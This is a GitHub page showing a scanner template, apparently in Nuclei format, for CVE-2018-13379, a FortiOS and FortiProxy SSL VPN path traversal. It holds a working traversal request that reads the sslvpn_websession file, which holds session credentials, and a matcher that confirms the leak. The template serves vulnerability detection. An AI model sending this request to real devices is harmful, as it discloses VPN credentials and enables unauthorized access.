forked from cckuailong/reapoc
-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2018-13379.yaml
25 lines (23 loc) · 976 Bytes
/
CVE-2018-13379.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
id: CVE-2018-13379
info:
name: FortiOS - Credentials Disclosure
author: organiccrap
severity: critical
tags: cve,cve2018,fortios
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2018-13379
cwe-id: CWE-22
description: "An Improper Limitation of a Pathname to a Restricted Directory (\"Path Traversal\") in Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests."
reference:
- https://fortiguard.com/advisory/FG-IR-18-384
- https://www.fortiguard.com/psirt/FG-IR-20-233
requests:
- method: GET
path:
- "{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
matchers:
- type: word
words:
- "var fgt_lang"